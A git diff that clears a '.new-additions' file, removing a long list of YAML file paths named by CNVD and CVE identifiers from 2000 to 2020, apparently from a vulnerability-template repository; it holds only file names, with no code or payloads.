diff --git a/.new-additions b/.new-additions index 26bd3facc2..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3101 +0,0 @@ -cnvd/2019/CNVD-2019-01348.yaml -cnvd/2019/CNVD-2019-06255.yaml -cnvd/2019/CNVD-2019-19299.yaml -cnvd/2019/CNVD-2019-32204.yaml -cnvd/2020/CNVD-2020-23735.yaml -cnvd/2020/CNVD-2020-56167.yaml -cnvd/2020/CNVD-2020-62422.yaml -cnvd/2020/CNVD-2020-68596.yaml -cnvd/2021/CNVD-2021-09650.yaml -cnvd/2021/CNVD-2021-10543.yaml -cnvd/2021/CNVD-2021-15822.yaml -cnvd/2021/CNVD-2021-15824.yaml -cnvd/2021/CNVD-2021-17369.yaml -cnvd/2021/CNVD-2021-30167.yaml -cnvd/2021/CNVD-2021-49104.yaml -cnvd/2022/CNVD-2022-03672.yaml -cves/2000/CVE-2000-0114.yaml -cves/2001/CVE-2001-1473.yaml -cves/2002/CVE-2002-1131.yaml -cves/2004/CVE-2004-0519.yaml -cves/2005/CVE-2005-2428.yaml -cves/2005/CVE-2005-4385.yaml -cves/2006/CVE-2006-1681.yaml -cves/2006/CVE-2006-2842.yaml -cves/2007/CVE-2007-0885.yaml -cves/2007/CVE-2007-4504.yaml -cves/2007/CVE-2007-4556.yaml -cves/2007/CVE-2007-5728.yaml -cves/2008/CVE-2008-2398.yaml -cves/2008/CVE-2008-2650.yaml -cves/2008/CVE-2008-4668.yaml -cves/2008/CVE-2008-4764.yaml -cves/2008/CVE-2008-5587.yaml -cves/2008/CVE-2008-6080.yaml -cves/2008/CVE-2008-6172.yaml -cves/2008/CVE-2008-6222.yaml -cves/2008/CVE-2008-6668.yaml -cves/2009/CVE-2009-0545.yaml -cves/2009/CVE-2009-0932.yaml -cves/2009/CVE-2009-1151.yaml -cves/2009/CVE-2009-1496.yaml -cves/2009/CVE-2009-1558.yaml -cves/2009/CVE-2009-1872.yaml -cves/2009/CVE-2009-2015.yaml -cves/2009/CVE-2009-2100.yaml -cves/2009/CVE-2009-3053.yaml -cves/2009/CVE-2009-3318.yaml -cves/2009/CVE-2009-4202.yaml -cves/2009/CVE-2009-4223.yaml -cves/2009/CVE-2009-4679.yaml -cves/2009/CVE-2009-5020.yaml -cves/2009/CVE-2009-5114.yaml -cves/2010/CVE-2010-0157.yaml -cves/2010/CVE-2010-0219.yaml -cves/2010/CVE-2010-0467.yaml -cves/2010/CVE-2010-0696.yaml -cves/2010/CVE-2010-0759.yaml -cves/2010/CVE-2010-0942.yaml -cves/2010/CVE-2010-0943.yaml -cves/2010/CVE-2010-0944.yaml -cves/2010/CVE-2010-0972.yaml -cves/2010/CVE-2010-0982.yaml -cves/2010/CVE-2010-0985.yaml -cves/2010/CVE-2010-1056.yaml -cves/2010/CVE-2010-1081.yaml -cves/2010/CVE-2010-1217.yaml -cves/2010/CVE-2010-1219.yaml -cves/2010/CVE-2010-1302.yaml -cves/2010/CVE-2010-1304.yaml -cves/2010/CVE-2010-1305.yaml -cves/2010/CVE-2010-1306.yaml -cves/2010/CVE-2010-1307.yaml -cves/2010/CVE-2010-1308.yaml -cves/2010/CVE-2010-1312.yaml -cves/2010/CVE-2010-1313.yaml -cves/2010/CVE-2010-1314.yaml -cves/2010/CVE-2010-1315.yaml -cves/2010/CVE-2010-1340.yaml -cves/2010/CVE-2010-1345.yaml -cves/2010/CVE-2010-1352.yaml -cves/2010/CVE-2010-1353.yaml -cves/2010/CVE-2010-1354.yaml -cves/2010/CVE-2010-1461.yaml -cves/2010/CVE-2010-1469.yaml -cves/2010/CVE-2010-1470.yaml -cves/2010/CVE-2010-1471.yaml -cves/2010/CVE-2010-1472.yaml -cves/2010/CVE-2010-1473.yaml -cves/2010/CVE-2010-1474.yaml -cves/2010/CVE-2010-1475.yaml -cves/2010/CVE-2010-1476.yaml -cves/2010/CVE-2010-1478.yaml -cves/2010/CVE-2010-1491.yaml -cves/2010/CVE-2010-1494.yaml -cves/2010/CVE-2010-1495.yaml -cves/2010/CVE-2010-1531.yaml -cves/2010/CVE-2010-1532.yaml -cves/2010/CVE-2010-1533.yaml -cves/2010/CVE-2010-1534.yaml -cves/2010/CVE-2010-1535.yaml -cves/2010/CVE-2010-1540.yaml -cves/2010/CVE-2010-1601.yaml -cves/2010/CVE-2010-1602.yaml -cves/2010/CVE-2010-1603.yaml -cves/2010/CVE-2010-1607.yaml -cves/2010/CVE-2010-1653.yaml -cves/2010/CVE-2010-1657.yaml -cves/2010/CVE-2010-1658.yaml -cves/2010/CVE-2010-1659.yaml -cves/2010/CVE-2010-1714.yaml -cves/2010/CVE-2010-1715.yaml -cves/2010/CVE-2010-1717.yaml -cves/2010/CVE-2010-1718.yaml -cves/2010/CVE-2010-1719.yaml -cves/2010/CVE-2010-1722.yaml -cves/2010/CVE-2010-1723.yaml -cves/2010/CVE-2010-1858.yaml -cves/2010/CVE-2010-1870.yaml -cves/2010/CVE-2010-1873.yaml -cves/2010/CVE-2010-1875.yaml -cves/2010/CVE-2010-1878.yaml -cves/2010/CVE-2010-1952.yaml -cves/2010/CVE-2010-1953.yaml -cves/2010/CVE-2010-1954.yaml -cves/2010/CVE-2010-1955.yaml -cves/2010/CVE-2010-1956.yaml -cves/2010/CVE-2010-1957.yaml -cves/2010/CVE-2010-1977.yaml -cves/2010/CVE-2010-1979.yaml -cves/2010/CVE-2010-1980.yaml -cves/2010/CVE-2010-1981.yaml -cves/2010/CVE-2010-1982.yaml -cves/2010/CVE-2010-1983.yaml -cves/2010/CVE-2010-2033.yaml -cves/2010/CVE-2010-2034.yaml -cves/2010/CVE-2010-2035.yaml -cves/2010/CVE-2010-2036.yaml -cves/2010/CVE-2010-2037.yaml -cves/2010/CVE-2010-2045.yaml -cves/2010/CVE-2010-2050.yaml -cves/2010/CVE-2010-2122.yaml -cves/2010/CVE-2010-2128.yaml -cves/2010/CVE-2010-2259.yaml -cves/2010/CVE-2010-2307.yaml -cves/2010/CVE-2010-2507.yaml -cves/2010/CVE-2010-2680.yaml -cves/2010/CVE-2010-2682.yaml -cves/2010/CVE-2010-2857.yaml -cves/2010/CVE-2010-2861.yaml -cves/2010/CVE-2010-2918.yaml -cves/2010/CVE-2010-2920.yaml -cves/2010/CVE-2010-3203.yaml -cves/2010/CVE-2010-3426.yaml -cves/2010/CVE-2010-4231.yaml -cves/2010/CVE-2010-4282.yaml -cves/2010/CVE-2010-4617.yaml -cves/2010/CVE-2010-4719.yaml -cves/2010/CVE-2010-4769.yaml -cves/2010/CVE-2010-4977.yaml -cves/2010/CVE-2010-5028.yaml -cves/2010/CVE-2010-5278.yaml -cves/2010/CVE-2010-5286.yaml -cves/2011/CVE-2011-0049.yaml -cves/2011/CVE-2011-1669.yaml -cves/2011/CVE-2011-2744.yaml -cves/2011/CVE-2011-2780.yaml -cves/2011/CVE-2011-3315.yaml -cves/2011/CVE-2011-4336.yaml -cves/2011/CVE-2011-4618.yaml -cves/2011/CVE-2011-4624.yaml -cves/2011/CVE-2011-4804.yaml -cves/2011/CVE-2011-4926.yaml -cves/2011/CVE-2011-5106.yaml -cves/2011/CVE-2011-5107.yaml -cves/2011/CVE-2011-5179.yaml -cves/2011/CVE-2011-5181.yaml -cves/2011/CVE-2011-5265.yaml -cves/2012/CVE-2012-0392.yaml -cves/2012/CVE-2012-0896.yaml -cves/2012/CVE-2012-0901.yaml -cves/2012/CVE-2012-0981.yaml -cves/2012/CVE-2012-0991.yaml -cves/2012/CVE-2012-0996.yaml -cves/2012/CVE-2012-1226.yaml -cves/2012/CVE-2012-1823.yaml -cves/2012/CVE-2012-1835.yaml -cves/2012/CVE-2012-2371.yaml -cves/2012/CVE-2012-3153.yaml -cves/2012/CVE-2012-4242.yaml -cves/2012/CVE-2012-4253.yaml -cves/2012/CVE-2012-4273.yaml -cves/2012/CVE-2012-4547.yaml -cves/2012/CVE-2012-4768.yaml -cves/2012/CVE-2012-4878.yaml -cves/2012/CVE-2012-4889.yaml -cves/2012/CVE-2012-4940.yaml -cves/2012/CVE-2012-5913.yaml -cves/2013/CVE-2013-1965.yaml -cves/2013/CVE-2013-2248.yaml -cves/2013/CVE-2013-2251.yaml -cves/2013/CVE-2013-2287.yaml -cves/2013/CVE-2013-3526.yaml -cves/2013/CVE-2013-3827.yaml -cves/2013/CVE-2013-4117.yaml -cves/2013/CVE-2013-4625.yaml -cves/2013/CVE-2013-5528.yaml -cves/2013/CVE-2013-5979.yaml -cves/2013/CVE-2013-7091.yaml -cves/2013/CVE-2013-7240.yaml -cves/2014/CVE-2014-10037.yaml -cves/2014/CVE-2014-2321.yaml -cves/2014/CVE-2014-2323.yaml -cves/2014/CVE-2014-2383.yaml -cves/2014/CVE-2014-2908.yaml -cves/2014/CVE-2014-2962.yaml -cves/2014/CVE-2014-3120.yaml -cves/2014/CVE-2014-3206.yaml -cves/2014/CVE-2014-3704.yaml -cves/2014/CVE-2014-3744.yaml -cves/2014/CVE-2014-4210.yaml -cves/2014/CVE-2014-4513.yaml -cves/2014/CVE-2014-4535.yaml -cves/2014/CVE-2014-4536.yaml -cves/2014/CVE-2014-4539.yaml -cves/2014/CVE-2014-4544.yaml -cves/2014/CVE-2014-4550.yaml -cves/2014/CVE-2014-4558.yaml -cves/2014/CVE-2014-4561.yaml -cves/2014/CVE-2014-4592.yaml -cves/2014/CVE-2014-4940.yaml -cves/2014/CVE-2014-5111.yaml -cves/2014/CVE-2014-5258.yaml -cves/2014/CVE-2014-5368.yaml -cves/2014/CVE-2014-6271.yaml -cves/2014/CVE-2014-6308.yaml -cves/2014/CVE-2014-8682.yaml -cves/2014/CVE-2014-8799.yaml -cves/2014/CVE-2014-9094.yaml -cves/2014/CVE-2014-9444.yaml -cves/2014/CVE-2014-9606.yaml -cves/2014/CVE-2014-9607.yaml -cves/2014/CVE-2014-9608.yaml -cves/2014/CVE-2014-9609.yaml -cves/2014/CVE-2014-9614.yaml -cves/2014/CVE-2014-9615.yaml -cves/2014/CVE-2014-9617.yaml -cves/2014/CVE-2014-9618.yaml -cves/2015/CVE-2015-0554.yaml -cves/2015/CVE-2015-1000012.yaml -cves/2015/CVE-2015-1427.yaml -cves/2015/CVE-2015-1503.yaml -cves/2015/CVE-2015-1880.yaml -cves/2015/CVE-2015-2067.yaml -cves/2015/CVE-2015-2068.yaml -cves/2015/CVE-2015-2080.yaml -cves/2015/CVE-2015-2166.yaml -cves/2015/CVE-2015-2807.yaml -cves/2015/CVE-2015-3306.yaml -cves/2015/CVE-2015-3337.yaml -cves/2015/CVE-2015-3648.yaml -cves/2015/CVE-2015-4050.yaml -cves/2015/CVE-2015-4414.yaml -cves/2015/CVE-2015-4632.yaml -cves/2015/CVE-2015-4694.yaml -cves/2015/CVE-2015-5461.yaml -cves/2015/CVE-2015-5471.yaml -cves/2015/CVE-2015-5531.yaml -cves/2015/CVE-2015-5688.yaml -cves/2015/CVE-2015-6477.yaml -cves/2015/CVE-2015-6544.yaml -cves/2015/CVE-2015-6920.yaml -cves/2015/CVE-2015-7297.yaml -cves/2015/CVE-2015-7377.yaml -cves/2015/CVE-2015-7450.yaml -cves/2015/CVE-2015-7780.yaml -cves/2015/CVE-2015-7823.yaml -cves/2015/CVE-2015-8349.yaml -cves/2015/CVE-2015-8399.yaml -cves/2015/CVE-2015-8813.yaml -cves/2015/CVE-2015-9414.yaml -cves/2015/CVE-2015-9480.yaml -cves/2016/CVE-2016-0957.yaml -cves/2016/CVE-2016-1000126.yaml -cves/2016/CVE-2016-1000127.yaml -cves/2016/CVE-2016-1000128.yaml -cves/2016/CVE-2016-1000129.yaml -cves/2016/CVE-2016-1000130.yaml -cves/2016/CVE-2016-1000131.yaml -cves/2016/CVE-2016-1000132.yaml -cves/2016/CVE-2016-1000133.yaml -cves/2016/CVE-2016-1000134.yaml -cves/2016/CVE-2016-1000135.yaml -cves/2016/CVE-2016-1000136.yaml -cves/2016/CVE-2016-1000137.yaml -cves/2016/CVE-2016-1000138.yaml -cves/2016/CVE-2016-1000139.yaml -cves/2016/CVE-2016-1000140.yaml -cves/2016/CVE-2016-1000141.yaml -cves/2016/CVE-2016-1000142.yaml -cves/2016/CVE-2016-1000143.yaml -cves/2016/CVE-2016-1000146.yaml -cves/2016/CVE-2016-1000148.yaml -cves/2016/CVE-2016-1000149.yaml -cves/2016/CVE-2016-1000152.yaml -cves/2016/CVE-2016-1000153.yaml -cves/2016/CVE-2016-1000154.yaml -cves/2016/CVE-2016-1000155.yaml -cves/2016/CVE-2016-10033.yaml -cves/2016/CVE-2016-10134.yaml -cves/2016/CVE-2016-10924.yaml -cves/2016/CVE-2016-10940.yaml -cves/2016/CVE-2016-10956.yaml -cves/2016/CVE-2016-10960.yaml -cves/2016/CVE-2016-10993.yaml -cves/2016/CVE-2016-2004.yaml -cves/2016/CVE-2016-2389.yaml -cves/2016/CVE-2016-3081.yaml -cves/2016/CVE-2016-3088.yaml -cves/2016/CVE-2016-3978.yaml -cves/2016/CVE-2016-4975.yaml -cves/2016/CVE-2016-4977.yaml -cves/2016/CVE-2016-5649.yaml -cves/2016/CVE-2016-6210.yaml -cves/2016/CVE-2016-6277.yaml -cves/2016/CVE-2016-7552.yaml -cves/2016/CVE-2016-7981.yaml -cves/2016/CVE-2016-8527.yaml -cves/2017/CVE-2017-0929.yaml -cves/2017/CVE-2017-1000028.yaml -cves/2017/CVE-2017-1000170.yaml -cves/2017/CVE-2017-1000486.yaml -cves/2017/CVE-2017-10271.yaml -cves/2017/CVE-2017-10974.yaml -cves/2017/CVE-2017-11444.yaml -cves/2017/CVE-2017-11610.yaml -cves/2017/CVE-2017-12149.yaml -cves/2017/CVE-2017-12542.yaml -cves/2017/CVE-2017-12544.yaml -cves/2017/CVE-2017-12611.yaml -cves/2017/CVE-2017-12615.yaml -cves/2017/CVE-2017-12629.yaml -cves/2017/CVE-2017-12635.yaml -cves/2017/CVE-2017-12637.yaml -cves/2017/CVE-2017-12794.yaml -cves/2017/CVE-2017-14135.yaml -cves/2017/CVE-2017-14535.yaml -cves/2017/CVE-2017-14537.yaml -cves/2017/CVE-2017-14651.yaml -cves/2017/CVE-2017-14849.yaml -cves/2017/CVE-2017-15287.yaml -cves/2017/CVE-2017-15363.yaml -cves/2017/CVE-2017-15647.yaml -cves/2017/CVE-2017-15715.yaml -cves/2017/CVE-2017-15944.yaml -cves/2017/CVE-2017-16806.yaml -cves/2017/CVE-2017-16877.yaml -cves/2017/CVE-2017-17043.yaml -cves/2017/CVE-2017-17059.yaml -cves/2017/CVE-2017-17451.yaml -cves/2017/CVE-2017-17562.yaml -cves/2017/CVE-2017-18024.yaml -cves/2017/CVE-2017-18536.yaml -cves/2017/CVE-2017-18598.yaml -cves/2017/CVE-2017-18638.yaml -cves/2017/CVE-2017-3506.yaml -cves/2017/CVE-2017-3528.yaml -cves/2017/CVE-2017-3881.yaml -cves/2017/CVE-2017-4011.yaml -cves/2017/CVE-2017-5487.yaml -cves/2017/CVE-2017-5521.yaml -cves/2017/CVE-2017-5638.yaml -cves/2017/CVE-2017-5982.yaml -cves/2017/CVE-2017-6090.yaml -cves/2017/CVE-2017-7269.yaml -cves/2017/CVE-2017-7391.yaml -cves/2017/CVE-2017-7615.yaml -cves/2017/CVE-2017-7921.yaml -cves/2017/CVE-2017-8917.yaml -cves/2017/CVE-2017-9140.yaml -cves/2017/CVE-2017-9288.yaml -cves/2017/CVE-2017-9506.yaml -cves/2017/CVE-2017-9791.yaml -cves/2017/CVE-2017-9805.yaml -cves/2017/CVE-2017-9822.yaml -cves/2017/CVE-2017-9841.yaml -cves/2018/CVE-2018-0127.yaml -cves/2018/CVE-2018-0296.yaml -cves/2018/CVE-2018-1000129.yaml -cves/2018/CVE-2018-1000130.yaml -cves/2018/CVE-2018-1000226.yaml -cves/2018/CVE-2018-1000533.yaml -cves/2018/CVE-2018-1000600.yaml -cves/2018/CVE-2018-1000861.yaml -cves/2018/CVE-2018-10093.yaml -cves/2018/CVE-2018-10095.yaml -cves/2018/CVE-2018-10141.yaml -cves/2018/CVE-2018-10201.yaml -cves/2018/CVE-2018-10818.yaml -cves/2018/CVE-2018-10822.yaml -cves/2018/CVE-2018-10823.yaml -cves/2018/CVE-2018-11409.yaml -cves/2018/CVE-2018-11709.yaml -cves/2018/CVE-2018-11759.yaml -cves/2018/CVE-2018-11776.yaml -cves/2018/CVE-2018-11784.yaml -cves/2018/CVE-2018-12031.yaml -cves/2018/CVE-2018-12054.yaml -cves/2018/CVE-2018-1207.yaml -cves/2018/CVE-2018-12095.yaml -cves/2018/CVE-2018-12613.yaml -cves/2018/CVE-2018-12634.yaml -cves/2018/CVE-2018-1271.yaml -cves/2018/CVE-2018-1273.yaml -cves/2018/CVE-2018-12998.yaml -cves/2018/CVE-2018-1335.yaml -cves/2018/CVE-2018-13379.yaml -cves/2018/CVE-2018-13380.yaml -cves/2018/CVE-2018-13980.yaml -cves/2018/CVE-2018-14013.yaml -cves/2018/CVE-2018-14064.yaml -cves/2018/CVE-2018-14574.yaml -cves/2018/CVE-2018-14728.yaml -cves/2018/CVE-2018-14912.yaml -cves/2018/CVE-2018-14916.yaml -cves/2018/CVE-2018-15138.yaml -cves/2018/CVE-2018-15473.yaml -cves/2018/CVE-2018-15517.yaml -cves/2018/CVE-2018-15535.yaml -cves/2018/CVE-2018-15745.yaml -cves/2018/CVE-2018-15961.yaml -cves/2018/CVE-2018-16059.yaml -cves/2018/CVE-2018-16133.yaml -cves/2018/CVE-2018-16167.yaml -cves/2018/CVE-2018-16283.yaml -cves/2018/CVE-2018-16288.yaml -cves/2018/CVE-2018-16299.yaml -cves/2018/CVE-2018-16668.yaml -cves/2018/CVE-2018-16670.yaml -cves/2018/CVE-2018-16671.yaml -cves/2018/CVE-2018-16716.yaml -cves/2018/CVE-2018-16763.yaml -cves/2018/CVE-2018-16836.yaml -cves/2018/CVE-2018-17246.yaml -cves/2018/CVE-2018-17254.yaml -cves/2018/CVE-2018-17431.yaml -cves/2018/CVE-2018-18069.yaml -cves/2018/CVE-2018-18264.yaml -cves/2018/CVE-2018-18323.yaml -cves/2018/CVE-2018-18570.yaml -cves/2018/CVE-2018-18775.yaml -cves/2018/CVE-2018-18777.yaml -cves/2018/CVE-2018-18778.yaml -cves/2018/CVE-2018-18925.yaml -cves/2018/CVE-2018-19365.yaml -cves/2018/CVE-2018-19386.yaml -cves/2018/CVE-2018-19439.yaml -cves/2018/CVE-2018-19458.yaml -cves/2018/CVE-2018-19753.yaml -cves/2018/CVE-2018-20462.yaml -cves/2018/CVE-2018-20470.yaml -cves/2018/CVE-2018-20824.yaml -cves/2018/CVE-2018-20985.yaml -cves/2018/CVE-2018-2392.yaml -cves/2018/CVE-2018-2628.yaml -cves/2018/CVE-2018-2791.yaml -cves/2018/CVE-2018-2893.yaml -cves/2018/CVE-2018-2894.yaml -cves/2018/CVE-2018-3167.yaml -cves/2018/CVE-2018-3238.yaml -cves/2018/CVE-2018-3714.yaml -cves/2018/CVE-2018-3760.yaml -cves/2018/CVE-2018-3810.yaml -cves/2018/CVE-2018-5230.yaml -cves/2018/CVE-2018-5233.yaml -cves/2018/CVE-2018-5316.yaml -cves/2018/CVE-2018-6008.yaml -cves/2018/CVE-2018-6910.yaml -cves/2018/CVE-2018-7251.yaml -cves/2018/CVE-2018-7422.yaml -cves/2018/CVE-2018-7467.yaml -cves/2018/CVE-2018-7490.yaml -cves/2018/CVE-2018-7600.yaml -cves/2018/CVE-2018-7602.yaml -cves/2018/CVE-2018-7700.yaml -cves/2018/CVE-2018-7719.yaml -cves/2018/CVE-2018-8006.yaml -cves/2018/CVE-2018-8033.yaml -cves/2018/CVE-2018-8715.yaml -cves/2018/CVE-2018-8719.yaml -cves/2018/CVE-2018-8727.yaml -cves/2018/CVE-2018-8770.yaml -cves/2018/CVE-2018-9118.yaml -cves/2018/CVE-2018-9161.yaml -cves/2018/CVE-2018-9205.yaml -cves/2018/CVE-2018-9845.yaml -cves/2018/CVE-2018-9995.yaml -cves/2019/CVE-2019-0193.yaml -cves/2019/CVE-2019-0221.yaml -cves/2019/CVE-2019-0230.yaml -cves/2019/CVE-2019-10068.yaml -cves/2019/CVE-2019-10092.yaml -cves/2019/CVE-2019-1010287.yaml -cves/2019/CVE-2019-1010290.yaml -cves/2019/CVE-2019-10232.yaml -cves/2019/CVE-2019-10405.yaml -cves/2019/CVE-2019-10758.yaml -cves/2019/CVE-2019-11013.yaml -cves/2019/CVE-2019-11248.yaml -cves/2019/CVE-2019-11510.yaml -cves/2019/CVE-2019-11580.yaml -cves/2019/CVE-2019-11581.yaml -cves/2019/CVE-2019-11869.yaml -cves/2019/CVE-2019-12276.yaml -cves/2019/CVE-2019-12314.yaml -cves/2019/CVE-2019-12461.yaml -cves/2019/CVE-2019-12593.yaml -cves/2019/CVE-2019-12616.yaml -cves/2019/CVE-2019-12725.yaml -cves/2019/CVE-2019-13101.yaml -cves/2019/CVE-2019-13392.yaml -cves/2019/CVE-2019-13396.yaml -cves/2019/CVE-2019-13462.yaml -cves/2019/CVE-2019-14205.yaml -cves/2019/CVE-2019-14223.yaml -cves/2019/CVE-2019-14312.yaml -cves/2019/CVE-2019-14470.yaml -cves/2019/CVE-2019-14696.yaml -cves/2019/CVE-2019-15043.yaml -cves/2019/CVE-2019-15107.yaml -cves/2019/CVE-2019-15501.yaml -cves/2019/CVE-2019-15713.yaml -cves/2019/CVE-2019-15858.yaml -cves/2019/CVE-2019-15859.yaml -cves/2019/CVE-2019-15889.yaml -cves/2019/CVE-2019-16097.yaml -cves/2019/CVE-2019-16123.yaml -cves/2019/CVE-2019-16278.yaml -cves/2019/CVE-2019-16313.yaml -cves/2019/CVE-2019-16332.yaml -cves/2019/CVE-2019-16525.yaml -cves/2019/CVE-2019-1653.yaml -cves/2019/CVE-2019-16662.yaml -cves/2019/CVE-2019-16759.yaml -cves/2019/CVE-2019-16920.yaml -cves/2019/CVE-2019-17270.yaml -cves/2019/CVE-2019-17382.yaml -cves/2019/CVE-2019-17503.yaml -cves/2019/CVE-2019-17506.yaml -cves/2019/CVE-2019-17538.yaml -cves/2019/CVE-2019-17558.yaml -cves/2019/CVE-2019-1821.yaml -cves/2019/CVE-2019-18393.yaml -cves/2019/CVE-2019-18394.yaml -cves/2019/CVE-2019-18818.yaml -cves/2019/CVE-2019-18922.yaml -cves/2019/CVE-2019-19134.yaml -cves/2019/CVE-2019-19368.yaml -cves/2019/CVE-2019-19781.yaml -cves/2019/CVE-2019-19824.yaml -cves/2019/CVE-2019-19908.yaml -cves/2019/CVE-2019-20085.yaml -cves/2019/CVE-2019-20141.yaml -cves/2019/CVE-2019-20183.yaml -cves/2019/CVE-2019-2578.yaml -cves/2019/CVE-2019-2579.yaml -cves/2019/CVE-2019-2616.yaml -cves/2019/CVE-2019-2725.yaml -cves/2019/CVE-2019-2729.yaml -cves/2019/CVE-2019-2767.yaml -cves/2019/CVE-2019-3396.yaml -cves/2019/CVE-2019-3401.yaml -cves/2019/CVE-2019-3402.yaml -cves/2019/CVE-2019-3403.yaml -cves/2019/CVE-2019-3799.yaml -cves/2019/CVE-2019-3911.yaml -cves/2019/CVE-2019-3912.yaml -cves/2019/CVE-2019-3929.yaml -cves/2019/CVE-2019-5127.yaml -cves/2019/CVE-2019-5418.yaml -cves/2019/CVE-2019-6112.yaml -cves/2019/CVE-2019-6340.yaml -cves/2019/CVE-2019-6715.yaml -cves/2019/CVE-2019-7219.yaml -cves/2019/CVE-2019-7238.yaml -cves/2019/CVE-2019-7254.yaml -cves/2019/CVE-2019-7256.yaml -cves/2019/CVE-2019-7275.yaml -cves/2019/CVE-2019-7481.yaml -cves/2019/CVE-2019-7543.yaml -cves/2019/CVE-2019-7609.yaml -cves/2019/CVE-2019-8442.yaml -cves/2019/CVE-2019-8446.yaml -cves/2019/CVE-2019-8449.yaml -cves/2019/CVE-2019-8451.yaml -cves/2019/CVE-2019-8903.yaml -cves/2019/CVE-2019-8937.yaml -cves/2019/CVE-2019-8982.yaml -cves/2019/CVE-2019-9041.yaml -cves/2019/CVE-2019-9618.yaml -cves/2019/CVE-2019-9670.yaml -cves/2019/CVE-2019-9726.yaml -cves/2019/CVE-2019-9733.yaml -cves/2019/CVE-2019-9955.yaml -cves/2019/CVE-2019-9978.yaml -cves/2020/CVE-2020-0618.yaml -cves/2020/CVE-2020-10148.yaml -cves/2020/CVE-2020-10546.yaml -cves/2020/CVE-2020-10547.yaml -cves/2020/CVE-2020-10548.yaml -cves/2020/CVE-2020-10549.yaml -cves/2020/CVE-2020-10770.yaml -cves/2020/CVE-2020-11034.yaml -cves/2020/CVE-2020-11110.yaml -cves/2020/CVE-2020-11455.yaml -cves/2020/CVE-2020-11529.yaml -cves/2020/CVE-2020-11546.yaml -cves/2020/CVE-2020-11547.yaml -cves/2020/CVE-2020-11710.yaml -cves/2020/CVE-2020-11738.yaml -cves/2020/CVE-2020-11853.yaml -cves/2020/CVE-2020-11854.yaml -cves/2020/CVE-2020-11930.yaml -cves/2020/CVE-2020-11978.yaml -cves/2020/CVE-2020-11991.yaml -cves/2020/CVE-2020-12054.yaml -cves/2020/CVE-2020-12116.yaml -cves/2020/CVE-2020-12447.yaml -cves/2020/CVE-2020-12800.yaml -cves/2020/CVE-2020-13117.yaml -cves/2020/CVE-2020-13167.yaml -cves/2020/CVE-2020-13483.yaml -cves/2020/CVE-2020-13700.yaml -cves/2020/CVE-2020-13927.yaml -cves/2020/CVE-2020-13937.yaml -cves/2020/CVE-2020-13942.yaml -cves/2020/CVE-2020-13945.yaml -cves/2020/CVE-2020-14092.yaml -cves/2020/CVE-2020-14179.yaml -cves/2020/CVE-2020-14181.yaml -cves/2020/CVE-2020-14413.yaml -cves/2020/CVE-2020-14864.yaml -cves/2020/CVE-2020-14882.yaml -cves/2020/CVE-2020-14883.yaml -cves/2020/CVE-2020-15129.yaml -cves/2020/CVE-2020-15148.yaml -cves/2020/CVE-2020-15227.yaml -cves/2020/CVE-2020-15500.yaml -cves/2020/CVE-2020-15505.yaml -cves/2020/CVE-2020-15568.yaml -cves/2020/CVE-2020-15920.yaml -cves/2020/CVE-2020-16139.yaml -cves/2020/CVE-2020-16846.yaml -cves/2020/CVE-2020-16952.yaml -cves/2020/CVE-2020-17362.yaml -cves/2020/CVE-2020-17453.yaml -cves/2020/CVE-2020-17496.yaml -cves/2020/CVE-2020-17505.yaml -cves/2020/CVE-2020-17506.yaml -cves/2020/CVE-2020-17518.yaml -cves/2020/CVE-2020-17519.yaml -cves/2020/CVE-2020-17530.yaml -cves/2020/CVE-2020-18268.yaml -cves/2020/CVE-2020-19282.yaml -cves/2020/CVE-2020-19283.yaml -cves/2020/CVE-2020-19295.yaml -cves/2020/CVE-2020-19360.yaml -cves/2020/CVE-2020-1938.yaml -cves/2020/CVE-2020-1943.yaml -cves/2020/CVE-2020-19625.yaml -cves/2020/CVE-2020-2036.yaml -cves/2020/CVE-2020-2096.yaml -cves/2020/CVE-2020-20982.yaml -cves/2020/CVE-2020-2103.yaml -cves/2020/CVE-2020-21224.yaml -cves/2020/CVE-2020-2140.yaml -cves/2020/CVE-2020-22840.yaml -cves/2020/CVE-2020-23015.yaml -cves/2020/CVE-2020-23517.yaml -cves/2020/CVE-2020-23575.yaml -cves/2020/CVE-2020-23972.yaml -cves/2020/CVE-2020-24148.yaml -cves/2020/CVE-2020-24186.yaml -cves/2020/CVE-2020-24223.yaml -cves/2020/CVE-2020-24312.yaml -cves/2020/CVE-2020-24391.yaml -cves/2020/CVE-2020-24550.yaml -cves/2020/CVE-2020-24571.yaml -cves/2020/CVE-2020-24579.yaml -cves/2020/CVE-2020-24589.yaml -cves/2020/CVE-2020-24912.yaml -cves/2020/CVE-2020-24949.yaml -cves/2020/CVE-2020-25078.yaml -cves/2020/CVE-2020-25213.yaml -cves/2020/CVE-2020-25223.yaml -cves/2020/CVE-2020-25495.yaml -cves/2020/CVE-2020-25506.yaml -cves/2020/CVE-2020-2551.yaml -cves/2020/CVE-2020-25540.yaml -cves/2020/CVE-2020-25780.yaml -cves/2020/CVE-2020-25864.yaml -cves/2020/CVE-2020-26073.yaml -cves/2020/CVE-2020-26153.yaml -cves/2020/CVE-2020-26214.yaml -cves/2020/CVE-2020-26413.yaml -cves/2020/CVE-2020-26919.yaml -cves/2020/CVE-2020-26948.yaml -cves/2020/CVE-2020-27361.yaml -cves/2020/CVE-2020-27735.yaml -cves/2020/CVE-2020-27866.yaml -cves/2020/CVE-2020-27982.yaml -cves/2020/CVE-2020-27986.yaml -cves/2020/CVE-2020-28188.yaml -cves/2020/CVE-2020-28208.yaml -cves/2020/CVE-2020-28351.yaml -cves/2020/CVE-2020-28871.yaml -cves/2020/CVE-2020-28976.yaml -cves/2020/CVE-2020-29164.yaml -cves/2020/CVE-2020-29227.yaml -cves/2020/CVE-2020-29395.yaml -cves/2020/CVE-2020-29453.yaml -cves/2020/CVE-2020-3187.yaml -cves/2020/CVE-2020-3452.yaml -cves/2020/CVE-2020-35234.yaml -cves/2020/CVE-2020-35338.yaml -cves/2020/CVE-2020-35476.yaml -cves/2020/CVE-2020-35489.yaml -cves/2020/CVE-2020-35580.yaml -cves/2020/CVE-2020-35598.yaml -cves/2020/CVE-2020-35713.yaml -cves/2020/CVE-2020-35729.yaml -cves/2020/CVE-2020-35736.yaml -cves/2020/CVE-2020-35749.yaml -cves/2020/CVE-2020-35774.yaml -cves/2020/CVE-2020-3580.yaml -cves/2020/CVE-2020-35846.yaml -cves/2020/CVE-2020-35847.yaml -cves/2020/CVE-2020-35848.yaml -cves/2020/CVE-2020-35951.yaml -cves/2020/CVE-2020-36112.yaml -cves/2020/CVE-2020-36289.yaml -cves/2020/CVE-2020-36365.yaml 